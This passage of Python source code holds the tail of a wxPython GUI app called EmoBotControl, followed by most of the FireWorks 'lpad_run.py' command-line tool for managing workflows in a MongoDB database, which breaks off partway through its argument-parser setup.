self.SetIcon(wx.Icon("images/icon.png"))
self.statusbar = self.CreateStatusBar()
self.InitUI()
def InitUI(self):
menubar = wx.MenuBar()
fileMenu = wx.Menu()
fitem = wx.MenuItem(fileMenu, wx.ID_EXIT, 'Quit\tCtrl+Q', 'Quit application')
fitem.SetBitmap(wx.Bitmap("images/exit.png"))
fileMenu.AppendItem(fitem)
helpMenu = wx.Menu()
aboutitem = wx.MenuItem(helpMenu, wx.ID_ABOUT, 'About\tCtrl+A', 'About EmoBotControl')
aboutitem.SetBitmap(wx.Bitmap("images/about.png"))
helpMenu.AppendItem(aboutitem)
menubar.Append(fileMenu, '&File')
menubar.Append(helpMenu, '&Help')
self.SetMenuBar(menubar)
self.Bind(wx.EVT_MENU, self.OnQuit, fitem)
self.Bind(wx.EVT_MENU, self.OnAboutBox, aboutitem)
self.statusbar.SetStatusText('Ready')
def OnQuit(self, e):
self.threadServer.server.shutdown()
self.threadServer.server.server_close()
self.Close()
def OnAboutBox(self, e):
description = about.description
licence = about.licence
info = wx.AboutDialogInfo()
info.SetIcon(wx.Icon("images/icon.png", wx.BITMAP_TYPE_PNG))
info.SetName('EmoBotControl')
info.SetVersion('1.0')
info.SetDescription(description)
info.SetCopyright('(C) 2016 Daro Oem')
info.SetWebSite('http://www.facebook.com/daro.oem')
info.SetLicence(licence)
info.AddDeveloper('Daro Oem')
wx.AboutBox(info)
if __name__ == '__main__':
app = wx.App()
frame = MainFrame(None, title='Mind Bot Control')
frame.Centre()
cap = ShowCapture(frame)
frame.Show()
app.MainLoop()
|
lpad_run.py
|
# coding: utf-8
from __future__ import unicode_literals
import six
"""
A runnable script for managing a FireWorks database (a command-line interface to launchpad.py)
"""
from argparse import ArgumentParser, ArgumentTypeError
import copy
import os
import shutil
import re
import time
import ast
import json
import datetime
import traceback
from six.moves import input, zip
from flask import g
from pymongo import DESCENDING, ASCENDING
import ruamel_yaml as yaml
from fireworks.fw_config import RESERVATION_EXPIRATION_SECS, \
RUN_EXPIRATION_SECS, PW_CHECK_NUM, MAINTAIN_INTERVAL, CONFIG_FILE_DIR, \
LAUNCHPAD_LOC, FWORKER_LOC, WEBSERVER_PORT, WEBSERVER_HOST
from fireworks.features.fw_report import FWReport
from fireworks.features.introspect import Introspector
from fireworks.core.launchpad import LaunchPad, WFLock
from fireworks.core.firework import Workflow, Firework
from fireworks.core.fworker import FWorker
from fireworks import __version__ as FW_VERSION
from fireworks import FW_INSTALL_DIR
from fireworks.user_objects.firetasks.script_task import ScriptTask
from fireworks.utilities.fw_serializers import DATETIME_HANDLER, recursive_dict
__author__ = 'Anubhav Jain'
__credits__ = 'Shyue Ping Ong'
__copyright__ = 'Copyright 2013, The Materials Project'
__version__ = '0.1'
__maintainer__ = 'Anubhav Jain'
__email__ = 'ajain@lbl.gov'
__date__ = 'Feb 7, 2013'
DEFAULT_LPAD_YAML = "my_launchpad.yaml"
def pw_check(ids, args, skip_pw=False):
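# Safety check for bulk operations: modifying more than PW_CHECK_NUM entries requires
# confirming the prompt or passing today's date via --password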
if len(ids) > PW_CHECK_NUM and not skip_pw:
m_password = datetime.datetime.now().strftime('%Y-%m-%d')
if not args.password:
if input('Are you sure? This will modify {} entries. (Y/N)'.format(len(ids)))[0].upper() == 'Y':
args.password = datetime.datetime.now().strftime('%Y-%m-%d')
else:
raise ValueError('Operation aborted by user.')
if args.password != m_password:
raise ValueError("Modifying more than {} entries requires setting the --password parameter! "
"(Today's date, e.g. 2012-02-25)".format(PW_CHECK_NUM))
return ids
def parse_helper(lp, args, wf_mode=False, skip_pw=False):
"""
Helper method to parse args that can take either id, name, state or query.
Args:
args
wf_mode (bool)
skip_pw (bool)
Returns:
list of ids
"""
if args.fw_id and sum([bool(x) for x in [args.name, args.state, args.query]]) >= 1:
raise ValueError('Cannot specify both fw_id and name/state/query')
query = {}
if args.fw_id:
return pw_check(args.fw_id, args, skip_pw)
if args.query:
query = ast.literal_eval(args.query)
if args.name and 'launches_mode' in args and not args.launches_mode:
query['name'] = args.name
if args.state:
query['state'] = args.state
if hasattr(args, "sort") and args.sort:
sort = [(args.sort, ASCENDING)]
elif hasattr(args, "rsort") and args.rsort:
sort = [(args.rsort, DESCENDING)]
else:
sort = None
max = args.max if hasattr(args, "max") else 0
if wf_mode:
return pw_check(lp.get_wf_ids(query, sort=sort, limit=max), args, skip_pw)
return pw_check(lp.get_fw_ids(query, sort=sort, limit=max, launches_mode=args.launches_mode),
args, skip_pw)
def get_lp(args):
try:
if not args.launchpad_file:
if os.path.exists(os.path.join(args.config_dir, DEFAULT_LPAD_YAML)):
args.launchpad_file = os.path.join(args.config_dir, DEFAULT_LPAD_YAML)
else:
args.launchpad_file = LAUNCHPAD_LOC
if args.launchpad_file:
return LaunchPad.from_file(args.launchpad_file)
else:
args.loglvl = 'CRITICAL' if args.silencer else args.loglvl
return LaunchPad(logdir=args.logdir, strm_lvl=args.loglvl)
except Exception:
traceback.print_exc()
err_message = 'FireWorks was not able to connect to MongoDB. Is the server running? ' \
'The database file specified was {}.'.format(args.launchpad_file)
if not args.launchpad_file:
err_message += ' Type "lpad init" if you would like to set up a file that specifies ' \
'location and credentials of your Mongo database (otherwise use default ' \
'localhost configuration).'
raise ValueError(err_message)
def init_yaml(args):
if args.uri_mode:
fields = (
("host", None, "Example: mongodb+srv://USER:PASSWORD@CLUSTERNAME.mongodb.net/fireworks"),
("ssl_ca_file", None, "Path to any client certificate to be used for mongodb connection"),
("authsource", None,
"Database used for authentication, if not connection db. e.g., for MongoDB Atlas this is sometimes "
"'admin'."))
else:
fields = (
("host", "localhost", "Example: 'localhost' or 'mongodb+srv://CLUSTERNAME.mongodb.net'"),
("port", 27017, ""),
("name", "fireworks", "Database under which to store the fireworks collections"),
("username", None, "Username for MongoDB authentication"),
("password", None, "Password for MongoDB authentication"),
("ssl_ca_file", None, "Path to any client certificate to be used for Mongodb connection"),
("authsource", None,
"Database used for authentication, if not connection db. e.g., for MongoDB Atlas this is sometimes "
"'admin'."))
doc = {}
if args.uri_mode:
print(
"Note 1: You are in URI format mode. This means that all database parameters (username, password, host, "
"port, database name, etc.) must be present in the URI. See: "
"https://docs.mongodb.com/manual/reference/connection-string/ for details.")
print("(Enter your connection URI in under the 'host' parameter)")
print("Please supply the following configuration values")
print("(press Enter if you want to accept the defaults)\n")
for k, default, helptext in fields:
val = input("Enter {} parameter. (default: {}). {}: ".format(k, default, helptext))
doc[k] = val if val else default
if "port" in doc:
doc["port"] = int(doc["port"]) # enforce the port as an int
if args.uri_mode:
doc["uri_mode"] = True
lp = LaunchPad.from_dict(doc)
lp.to_file(args.config_file)
print("\nConfiguration written to {}!".format(args.config_file))
def reset(args):
lp = get_lp(args)
if not args.password:
if input('Are you sure? This will RESET {} workflows and all data. (Y/N)'.format(
lp.workflows.count()))[0].upper() == 'Y':
args.password = datetime.datetime.now().strftime('%Y-%m-%d')
else:
raise ValueError('Operation aborted by user.')
lp.reset(args.password)
def add_wf(args):
lp = get_lp(args)
if args.dir:
files = []
for f in args.wf_file:
files.extend([os.path.join(f, i) for i in os.listdir(f)])
else:
files = args.wf_file
for f in files:
fwf = Workflow.from_file(f)
if args.check:
from fireworks.utilities.dagflow import DAGFlow
DAGFlow.from_fireworks(fwf).check()
lp.add_wf(fwf)
def append_wf(args):
lp = get_lp(args)
lp.append_wf(
Workflow.from_file(args.wf_file),
args.fw_id,
detour=args.detour,
pull_spec_mods=args.pull_spec_mods
)
def dump_wf(args):
lp = get_lp(args)
lp.get_wf_by_fw_id(args.fw_id).to_file(args.wf_file)
def check_wf(args):
from fireworks.utilities.dagflow import DAGFlow
lp = get_lp(args)
DAGFlow.from_fireworks(lp.get_wf_by_fw_id(args.fw_id)).check()
def add_wf_dir(args):
lp = get_lp(args)
for filename in os.listdir(args.wf_dir):
fwf = Workflow.from_file(filename)
lp.add_wf(fwf)
def print_fws(ids, lp, args):
"""Prints results of some FireWorks query to stdout."""
fws = []
if args.display_format == 'ids':
fws = ids
elif args.display_format == 'count':
fws = [ids]
else:
for id in ids:
fw = lp.get_fw_by_id(id)
d = fw.to_dict()
d['state'] = d.get('state', 'WAITING')
if args.display_format == 'more' or args.display_format == 'less':
if 'archived_launches' in d:
del d['archived_launches']
del d['spec']
if args.display_format == 'less':
if 'launches' in d:
del d['launches']
fws.append(d)
if len(fws) == 1:
fws = fws[0]
print(args.output(fws))
def get_fw_ids_helper(lp, args, count_only=None):
"""Build fws query from command line options and submit.
Parameters:
lp (fireworks.core.launchpad.LaunchPad)
args (argparse.Namespace)
count_only (bool): if None, then looked up in args.
Returns:
[int]: resulting fw_ids or count of fws in query.
"""
if sum([bool(x) for x in [args.fw_id, args.name, args.state, args.query]]) > 1:
raise ValueError('Please specify exactly one of (fw_id, name, state, query)')
if sum([bool(x) for x in [args.fw_id, args.name, args.state, args.query]]) == 0:
args.query = '{}'
args.display_format = args.display_format if args.display_format else 'ids'
if sum([bool(x) for x in [args.fw_id, args.name, args.qid]]) > 1:
raise ValueError('Please specify exactly one of (fw_id, name, qid)')
else:
args.display_format = args.display_format if args.display_format else 'more'
if args.fw_id:
query = {'fw_id': {"$in": args.fw_id}}
elif args.name and not args.launches_mode:
query = {'name': args.name}
elif args.state:
query = {'state': args.state}
elif args.query:
query = ast.literal_eval(args.query)
else:
query = None
if args.sort:
sort = [(args.sort, ASCENDING)]
elif args.rsort:
sort = [(args.rsort, DESCENDING)]
else:
sort = None
if count_only is None:
count_only = (args.display_format == 'count')
if args.qid:
ids = lp.get_fw_ids_from_reservation_id(args.qid)
if query:
query['fw_id'] = {"$in": ids}
ids = lp.get_fw_ids(query, sort, args.max, launches_mode=args.launches_mode)
else:
ids = lp.get_fw_ids(query, sort, args.max, count_only=count_only,
launches_mode=args.launches_mode)
return ids
def get_fws_helper(lp, ids, args):
"""Get fws from ids in a representation according to args.display_format."""
fws = []
if args.display_format == 'ids':
fws = ids
elif args.display_format == 'count':
fws = [ids]
else:
for id in ids:
fw = lp.get_fw_by_id(id)
d = fw.to_dict()
d['state'] = d.get('state', 'WAITING')
if args.display_format == 'more' or args.display_format == 'less':
if 'archived_launches' in d:
del d['archived_launches']
del d['spec']
if args.display_format == 'less':
if 'launches' in d:
del d['launches']
fws.append(d)
if len(fws) == 1:
fws = fws[0]
return fws
def get_fws(args):
lp = get_lp(args)
ids = get_fw_ids_helper(lp, args)
fws = get_fws_helper(lp, ids, args)
print(args.output(fws))
def get_fws_in_wfs(args):
# get_wfs
lp = get_lp(args)
if sum([bool(x) for x in [args.wf_fw_id, args.wf_name, args.wf_state, args.wf_query]]) > 1:
raise ValueError('Please specify exactly one of (fw_id, name, state, query)')
if sum([bool(x) for x in [args.wf_fw_id, args.wf_name, args.wf_state, args.wf_query]]) == 0:
args.wf_query = '{}'
if args.wf_fw_id:
wf_query = {'nodes': {"$in": args.wf_fw_id}}
elif args.wf_name:
wf_query = {'name': args.wf_name}
elif args.wf_state:
wf_query = {'state': args.wf_state}
else:
wf_query = ast.literal_eval(args.wf_query)
# get_fws
if sum([bool(x) for x in [args.fw_fw_id, args.fw_name, args.fw_state, args.fw_query]]) > 1:
raise ValueError('Please specify exactly one of (fw_id, name, state, query)')
if sum([bool(x) for x in [args.fw_fw_id, args.fw_name, args.fw_state, args.fw_query]]) == 0:
args.fw_query = '{}'
args.display_format = args.display_format if args.display_format else 'ids'
if sum([bool(x) for x in [args.fw_fw_id, args.fw_name, args.qid]]) > 1:
raise ValueError('Please specify exactly one of (fw_id, name, qid)')
else:
args.display_format = args.display_format if args.display_format else 'more'
if args.fw_fw_id:
fw_query = {'fw_id': {"$in": args.fw_fw_id}}
elif args.fw_name and not args.launches_mode:
fw_query = {'name': args.fw_name}
elif args.fw_state:
fw_query = {'state': args.fw_state}
elif args.fw_query:
fw_query = ast.literal_eval(args.fw_query)
else:
fw_query = None
if args.sort:
sort = [(args.sort, ASCENDING)]
elif args.rsort:
sort = [(args.rsort, DESCENDING)]
else:
sort = None
if args.qid:
ids = lp.get_fw_ids_from_reservation_id(args.qid)
if fw_query:
fw_query['fw_id'] = {"$in": ids}
ids = lp.get_fw_ids_in_wfs(wf_query=wf_query, fw_query=fw_query,
sort=sort, limit=args.max,
launches_mode=args.launches_mode)
else:
ids = lp.get_fw_ids_in_wfs(wf_query=wf_query, fw_query=fw_query,
sort=sort, limit=args.max,
count_only=args.display_format == 'count',
launches_mode=args.launches_mode)
print_fws(ids, lp, args)
def update_fws(args):
lp = get_lp(args)
fw_ids = parse_helper(lp, args)
lp.update_spec(fw_ids, json.loads(args.update), args.mongo)
def get_wfs(args):
lp = get_lp(args)
if sum([bool(x) for x in [args.fw_id, args.name, args.state, args.query]]) > 1:
raise ValueError('Please specify exactly one of (fw_id, name, state, query)')
if sum([bool(x) for x in [args.fw_id, args.name, args.state, args.query]]) == 0:
args.query = '{}'
args.display_format = args.display_format if args.display_format else 'ids'
else:
args.display_format = args.display_format if args.display_format else 'more'
if args.fw_id:
query = {'nodes': {"$in": args.fw_id}}
elif args.name:
query = {'name': args.name}
elif args.state:
query = {'state': args.state}
else:
query = ast.literal_eval(args.query)
if args.sort:
sort = [(args.sort, ASCENDING)]
elif args.rsort:
sort = [(args.rsort, DESCENDING)]
else:
sort = None
ids = lp.get_wf_ids(query, sort, args.max, count_only=args.display_format == 'count')
if args.display_format == 'ids':
wfs = ids
elif args.display_format == 'count':
wfs = [ids]
else:
wfs = []
for i in ids:
d = lp.get_wf_summary_dict(i, args.display_format)
d["name"] += "--%d" % i
wfs.append(d)
if args.table:
if wfs:
headers = list(wfs[0].keys())
from prettytable import PrettyTable
t = PrettyTable(headers)
for d in wfs:
t.add_row([d.get(k) for k in headers])
print(t)
else:
if len(wfs) == 1:
wfs = wfs[0]
print(args.output(wfs))
def delete_wfs(args):
lp = get_lp(args)
fw_ids = parse_helper(lp, args, wf_mode=True)
for f in fw_ids:
lp.delete_wf(f, delete_launch_dirs=args.delete_launch_dirs)
lp.m_logger.debug('Processed fw_id: {}'.format(f))
lp.m_logger.info('Finished deleting {} WFs'.format(len(fw_ids)))
def get_children(links, start, max_depth):
data = {}
for l, c in links.items():
if l == start:
if len(c) > 0:
data[l] = [get_children(links, i, max_depth) for i in c]
else:
data[l] = c
return data
def detect_lostruns(args):
lp = get_lp(args)
query = ast.literal_eval(args.query) if args.query else None
launch_query = ast.literal_eval(args.launch_query) if args.launch_query else None
fl, ff, fi = lp.detect_lostruns(expiration_secs=args.time, fizzle=args.fizzle, rerun=args.rerun,
max_runtime=args.max_runtime, min_runtime=args.min_runtime,
refresh=args.refresh, query=query, launch_query=launch_query)
lp.m_logger.debug('Detected {} lost launches: {}'.format(len(fl), fl))
lp.m_logger.info('Detected {} lost FWs: {}'.format(len(ff), ff))
if args.display_format is not None and args.display_format != 'none':
print_fws(ff, lp, args)
lp.m_logger.info('Detected {} inconsistent FWs: {}'.format(len(fi), fi))
if args.display_format is not None and args.display_format != 'none':
print_fws(fi, lp, args)
if len(ff) > 0 and not args.fizzle and not args.rerun:
print("You can fix lost FWs using the --rerun or --fizzle arguments to the "
"detect_lostruns command")
if len(fi) > 0 and not args.refresh:
print("You can fix inconsistent FWs using the --refresh argument to the "
"detect_lostruns command")
def detect_unreserved(args):
lp = get_lp(args)
if args.display_format is not None and args.display_format != 'none':
unreserved = lp.detect_unreserved(expiration_secs=args.time, rerun=False)
# very inefficient, replace by mongo aggregation
fw_ids = []
for launch_id in unreserved:
launch = lp.get_launch_by_id(launch_id)
fw_ids.append(launch.fw_id)
print_fws(fw_ids, lp, args)
print(lp.detect_unreserved(expiration_secs=args.time, rerun=args.rerun))
def tuneup(args):
lp = get_lp(args)
lp.tuneup(bkground=not args.full)
def defuse_wfs(args):
lp = get_lp(args)
fw_ids = parse_helper(lp, args, wf_mode=True)
for f in fw_ids:
lp.defuse_wf(f, defuse_all_states=args.defuse_all_states)
lp.m_logger.debug('Processed fw_id: {}'.format(f))
lp.m_logger.info('Finished defusing {} WFs.'.format(len(fw_ids)))
if not args.defuse_all_states:
lp.m_logger.info('Note: FIZZLED and COMPLETED FWs were not defused. '
'Use the --defuse_all_states option to force this (or rerun FIZZLED FWs first).')
def pause_wfs(args):
lp = get_lp(args)
fw_ids = parse_helper(lp, args, wf_mode=True)
for f in fw_ids:
lp.pause_wf(f)
lp.m_logger.debug('Processed fw_id: {}'.format(f))
lp.m_logger.info('Finished pausing {} WFs.'.format(len(fw_ids)))
def archive(args):
lp = get_lp(args)
fw_ids = parse_helper(lp, args, wf_mode=True)
for f in fw_ids:
lp.archive_wf(f)
lp.m_logger.debug('Processed fw_id: {}'.format(f))
lp.m_logger.info('Finished archiving {} WFs'.format(len(fw_ids)))
def reignite_wfs(args):
lp = get_lp(args)
fw_ids = parse_helper(lp, args, wf_mode=True)
for f in fw_ids:
lp.reignite_wf(f)
lp.m_logger.debug('Processed Workflow with fw_id: {}'.format(f))
lp.m_logger.info('Finished reigniting {} Workflows'.format(len(fw_ids)))
def defuse_fws(args):
lp = get_lp(args)
fw_ids = parse_helper(lp, args)
for f in fw_ids:
lp.defuse_fw(f)
lp.m_logger.debug('Processed fw_id: {}'.format(f))
lp.m_logger.info('Finished defusing {} FWs'.format(len(fw_ids)))
def pause_fws(args):
lp = get_lp(args)
fw_ids = parse_helper(lp, args)
for f in fw_ids:
lp.pause_fw(f)
lp.m_logger.debug('Processed fw_id: {}'.format(f))
lp.m_logger.info('Finished pausing {} FWs'.format(len(fw_ids)))
def reignite_fws(args):
lp = get_lp(args)
fw_ids = parse_helper(lp, args)
for f in fw_ids:
lp.reignite_fw(f)
lp.m_logger.debug('Processed fw_id: {}'.format(f))
lp.m_logger.info('Finished reigniting {} FWs'.format(len(fw_ids)))
def resume_fws(args):
lp = get_lp(args)
fw_ids = parse_helper(lp, args)
for f in fw_ids:
lp.resume_fw(f)
lp.m_logger.debug('Processed fw_id: {}'.format(f))
lp.m_logger.info('Finished resuming {} FWs'.format(len(fw_ids)))
def rerun_fws(args):
lp = get_lp(args)
fw_ids = parse_helper(lp, args)
if args.task_level:
launch_ids = args.launch_id
if launch_ids is None:
launch_ids = ['last'] * len(fw_ids)
elif len(launch_ids) != len(fw_ids):
raise ValueError("Specify the same number of tasks and launches")
else:
launch_ids = [None] * len(fw_ids)
for f, l in zip(fw_ids, launch_ids):
lp.rerun_fw(int(f), recover_launch=l, recover_mode=args.recover_mode)
lp.m_logger.debug('Processed fw_id: {}'.format(f))
lp.m_logger.info('Finished setting {} FWs to rerun'.format(len(fw_ids)))
def refresh(args):
lp = get_lp(args)
fw_ids = parse_helper(lp, args, wf_mode=True)
for f in fw_ids:
wf = lp.get_wf_by_fw_id_lzyfw(f)
for fw_id in wf.root_fw_ids:
lp._refresh_wf(fw_id)
lp.m_logger.debug('Processed Workflow with fw_id: {}'.format(f))
lp.m_logger.info('Finished refreshing {} Workflows'.format(len(fw_ids)))
def unlock(args):
lp = get_lp(args)
fw_ids = parse_helper(lp, args, wf_mode=True)
for f in fw_ids:
with WFLock(lp, f, expire_secs=0, kill=True):
lp.m_logger.warning('FORCIBLY RELEASING LOCK DUE TO USER COMMAND, WF: {}'.format(f))
lp.m_logger.debug('Processed Workflow with fw_id: {}'.format(f))
lp.m_logger.info('Finished unlocking {} Workflows'.format(len(fw_ids)))
def get_qid(args):
lp = get_lp(args)
for f in args.fw_id:
print(lp.get_reservation_id_from_fw_id(f))
def cancel_qid(args):
lp = get_lp(args)
lp.m_logger.warning("WARNING: cancel_qid does not actually remove jobs from the queue "
"(e.g., execute qdel), this must be done manually!")
lp.cancel_reservation_by_reservation_id(args.qid)
def set_priority(args):
wf_mode = args.wf
lp = get_lp(args)
fw_ids = parse_helper(lp, args, wf_mode=wf_mode)
if wf_mode:
all_fw_ids = set()
for fw_id in fw_ids:
wf = lp.get_wf_by_fw_id_lzyfw(fw_id)
all_fw_ids.update(wf.id_fw.keys())
fw_ids = list(all_fw_ids)
for f in fw_ids:
lp.set_priority(f, args.priority)
lp.m_logger.debug("Processed fw_id {}".format(f))
lp.m_logger.info("Finished setting priorities of {} FWs".format(len(fw_ids)))
def _open_webbrowser(url):
"""Open a web browser after a delay to give the web server more startup time."""
import webbrowser
time.sleep(2)
webbrowser.open(url)
def webgui(args):
from fireworks.flask_site.app import app
app.lp = get_lp(args)
if any([args.webgui_username, args.webgui_password]) and not \
all([args.webgui_username, args.webgui_password]):
raise ValueError("Must set BOTH a webgui_username and webgui_password!")
app.config["WEBGUI_USERNAME"] = args.webgui_username
app.config["WEBGUI_PASSWORD"] = args.webgui_password
if args.wflowquery:
app.BASE_Q_WF = json.loads(args.wflowquery)
if args.fwquery:
app.BASE_Q = json.loads(args.fwquery)
if "state" in app.BASE_Q:
app.BASE_Q_WF["state"] = app.BASE_Q["state"]
if not args.server_mode:
from threading import Thread
url = "http://{}:{}".format(args.host, args.port)
p1 = Thread(target=_open_webbrowser, args=(url,))
p1.start()
app.run(host=args.host, port=args.port, debug=args.debug)
p1.join()
else:
try:
from fireworks.flask_site.gunicorn import (
StandaloneApplication, number_of_workers)
except ImportError:
import sys
sys.exit("Gunicorn is required for server mode. "
"Install using `pip install gunicorn`.")
nworkers = args.nworkers if args.nworkers else number_of_workers()
options = {
'bind': '%s:%s' % (args.host, args.port),
'workers': nworkers,
}
StandaloneApplication(app, options).run()
def add_scripts(args):
lp = get_lp(args)
args.names = args.names if args.names else [None] * len(args.scripts)
args.wf_name = args.wf_name if args.wf_name else args.names[0]
fws = []
links = {}
for idx, s in enumerate(args.scripts):
fws.append(Firework(ScriptTask({'script': s, 'use_shell': True}), name=args.names[idx], fw_id=idx))
if idx != 0:
links[idx - 1] = idx
lp.add_wf(Workflow(fws, links, args.wf_name))
def recover_offline(args):
lp = get_lp(args)
fworker_name = FWorker.from_file(args.fworker_file).name if args.fworker_file else None
failed_fws = []
recovered_fws = []
for l in lp.offline_runs.find({"completed": False, "deprecated": False},
{"launch_id": 1, "fw_id": 1}):
if fworker_name and lp.launches.count({"launch_id": l["launch_id"],
"fworker.name": fworker_name}) == 0:
continue
fw = lp.recover_offline(l['launch_id'], args.ignore_errors, args.print_errors)
if fw:
failed_fws.append(l['fw_id'])
else:
recovered_fws.append(l['fw_id'])
lp.m_logger.info("FINISHED recovering offline runs. {} job(s) recovered: {}".format(
len(recovered_fws), recovered_fws))
if failed_fws:
lp.m_logger.info("FAILED to recover offline fw_ids: {}".format(failed_fws))
def forget_offline(args):
lp = get_lp(args)
fw_ids = parse_helper(lp, args)
for f in fw_ids:
lp.forget_offline(f, launch_mode=False)
lp.m_logger.debug('Processed fw_id: {}'.format(f))
lp.m_logger.info('Finished forget_offline, processed {} FWs'.format(len(fw_ids)))
def report(args):
lp = get_lp(args)
query = ast.literal_eval(args.query) if args.query else None
fwr = FWReport(lp)
stats = fwr.get_stats(coll=args.collection, interval=args.interval,
num_intervals=args.num_intervals, additional_query=query)
title_str = "Stats on {}".format(args.collection)
title_dec = "-" * len(title_str)
print(title_dec)
print(title_str)
print(title_dec)
print(fwr.get_stats_str(stats))
def introspect(args):
print("NOTE: This feature is in beta mode...")
lp = get_lp(args)
isp = Introspector(lp)
for coll in ['launches', 'tasks', 'fireworks', 'workflows']:
print('generating report for {}...please wait...'.format(coll))
print('')
table = isp.introspect_fizzled(coll=coll, threshold=args.threshold, limit=args.max)
isp.print_report(table, coll)
print('')
def get_launchdir(args):
lp = get_lp(args)
ld = lp.get_launchdir(args.fw_id, args.launch_idx)
print(ld)
def track_fws(args):
lp = get_lp(args)
fw_ids = parse_helper(lp, args, skip_pw=True)
include = args.include
exclude = args.exclude
first_print = True # used to control newline
for f in fw_ids:
data = lp.get_tracker_data(f)
output = []
for d in data:
for t in d['trackers']:
if (not include or t.filename in include) and (not exclude or t.filename not in exclude):
output.append('## Launch id: {}'.format(d['launch_id']))
output.append(str(t))
if output:
name = lp.fireworks.find_one({"fw_id": f}, {"name": 1})['name']
output.insert(0, '# FW id: {}, FW name: {}'.format(f, name))
if first_print:
first_print = False
else:
output.insert(0, '>------<')
print('\n'.join(output))
def version(args):
print('FireWorks version:', FW_VERSION)
print('located in:', FW_INSTALL_DIR)
def maintain(args):
lp = get_lp(args)
lp.maintain(args.infinite, args.maintain_interval)
def orphaned(args):
# get_fws
lp = get_lp(args)
fw_ids = get_fw_ids_helper(lp, args, count_only=False)
# get_wfs
orphaned_fw_ids = []
for fw_id in fw_ids:
query = {'nodes': fw_id}
wf_ids = lp.get_wf_ids(query)
if len(wf_ids) == 0:
orphaned_fw_ids.append(fw_id)
fws = get_fws_helper(lp, orphaned_fw_ids, args)
if args.remove:
lp.m_logger.info('Found {} orphaned fw_ids: {}'.format(
len(orphaned_fw_ids), orphaned_fw_ids))
lp.delete_fws(orphaned_fw_ids, delete_launch_dirs=args.delete_launch_dirs)
else:
print(args.output(fws))
def get_output_func(format):
if format == "json":
return lambda x: json.dumps(x, default=DATETIME_HANDLER, indent=4)
else:
return lambda x: yaml.safe_dump(recursive_dict(x, preserve_unicode=False),
default_flow_style=False)
def arg_positive_int(value):
try:
ivalue = int(value)
if ivalue < 1:
raise ValueError()
except ValueError:
raise ArgumentTypeError("{} is not a positive integer".format(value))
return ivalue
def lpad():
m_description = 'A command line interface to FireWorks. For more help on a specific command, ' \
'type "lpad <command> -h".'
parser = ArgumentParser(description=m_description)
parent_parser = ArgumentParser(add_help=False)
parser.add_argument("-o", "--output", choices=["json", "yaml"],
default="json", type=lambda s: s.lower(),
help="Set output display format to either json or YAML. "
"YAML is easier to read for long documents. JSON is the default.")
subparsers = parser.add_subparsers(help='command', dest='command')
# This makes common argument options easier to maintain. E.g., what if
# there is a new state or disp option?
# NOTE: Those sets of standard options are not used consistently below (jotelha)
fw_id_args = ["-i", "--fw_id"]
fw_id_kwargs = {"type": str, "help": "fw_id"}
state_args = ['-s', '--state']
state_kwargs = {"type": lambda s: s.upper(), "help": "Select by state.",
"choices": list(Firework.STATE_RANKS.keys())}
disp_args = ['-d', '--display_format']
disp_kwargs = {"type": lambda s: s.lower(), "help": "Display format.",
"default": "less",
"choices": ["all", "more", "less", "ids", "count",
"reservations"]}
# enhanced display options allow for value 'none' or None (default) for no output
enh_disp_args = copy.deepcopy(disp_args)
enh_disp_kwargs = copy.deepcopy(disp_kwargs)
enh_disp_kwargs["choices"].append("none")
enh_disp_kwargs["default"] = None
query_args = ["-q", "--query"]
query_kwargs = {"help": 'Query (enclose pymongo-style dict in '
'single-quotes, e.g. \'{"state":"COMPLETED"}\')'}
launches_mode_args = ["-lm", "--launches_mode"]
launches_mode_kwargs = {"action": "store_true",
"help": 'Query the launches collection (enclose pymongo-style '
'dict in single-quotes, e.g. \'{"launch_id": 1}\')'}
qid_args = ["--qid"]
qid_kwargs = {"help": "Query by reservation id of job in queue"}
# for using fw- and wf-specific options on one command line, distinguish by prefix fw and wf
# prefix short one-dash options with 'wf', i.e. '-i' -> '-wfi'
# prefix long two-dash options with 'wf_', i.e. '--fw_id' -> '--wf_fw_id'
wf_prefixed_fw_id_args = [re.sub('^-([^-].*)$', '-wf\\1', s) for s in fw_id_args]
wf_prefixed_fw_id_args = [re.sub('^--(.*)$', '--wf_\\1', s) for s in wf_prefixed_fw_id_args]
wf_prefixed_state_args = [re.sub('^-([^-].*)$', '-wf\\1', s) for s in state_args]
wf_prefixed_state_args = [re.sub('^--(.*)$', '--wf_\\1', s) for s in wf_prefixed_state_args]
wf_prefixed_query_args = [re.sub('^-([^-].*)$', '-wf\\1', s) for s in query_args]
wf_prefixed_query_args = [re.sub('^--(.*)$', '--wf_\\1', s) for s in wf_prefixed_query_args]
# prefix short one-dash options with 'fw', i.e. '-i' -> '-fwi'
# prefix long two-dash options with 'fw_', i.e. '--fw_id' -> '--fw_fw_id'
fw_prefixed_fw_id_args = [re.sub('^-([^-].*)$', '-fw\\1', s) for s in fw_id_args]
fw_prefixed_fw_id_args = [re.sub('^--(.*)$', '--fw_\\1', s) for s in fw_prefixed_fw_id_args]
fw_prefixed_state_args = [re.sub('^-([^-].*)$', '-fw\\1', s) for s in state_args]
fw_prefixed_state_args = [re.sub('^--(.*)$', '--fw_\\1', s) for s in fw_prefixed_state_args]
fw_prefixed_query_args = [re.sub('^-([^-].*)$', '-fw\\1', s) for s in query_args]
fw_prefixed_query_args = [re.sub('^--(.*)$', '--fw_\\1', s) for s in fw_prefixed_query_args]
# filter all long options, i.e. '--fw_id' and strip off preceding '--'
fw_id_options = [re.sub('^--(.*)$', '\\1', opt)
for opt in [*fw_id_args, *wf_prefixed_fw_id_args, *fw_prefixed_fw_id_args]
if re.match('^--.*$', opt)]
version_parser = subparsers.add_parser(
'version',
help='Print the version and location of FireWorks')
version_parser.set_defaults(func=version)
init_parser = subparsers.add_parser(
'init', help='Initialize a Fireworks launchpad YAML file.')
init_parser.add_argument('-u', '--uri_mode',
action="store_true",
help="Connect via a URI, see: "
"https://docs.mongodb.com/manual/reference/connection-string/")
init_parser.add_argument('--config-file', default=DEFAULT_LPAD_YAML,
type=str,
help="Filename to write to.")
init_parser.set_defaults(func=init_yaml)
reset_parser = subparsers.add_parser('reset', help='reset and re-initialize the FireWorks database')
reset_parser.add_argument('--password', help="Today's date, e.g. 2012-02-25. "
"Password or positive response to input prompt "
"required to protect against accidental reset.")
reset_parser.set_defaults(func=reset)
addwf_parser = subparsers.add_parser('add', help='insert a Workflow from file')
addwf_parser.add_argument('-d', '--dir',
action="store_true",
help="Directory mode. Finds all files in the "
"paths given by wf_file.")
addwf_parser.add_argument('wf_file', nargs="+",
help="Path to a Firework or Workflow file")
addwf_parser.add_argument('-c', '--check', help='check the workflow before adding', dest='check',
action='store_true')
addwf_parser.set_defaults(func=add_wf, check=False)
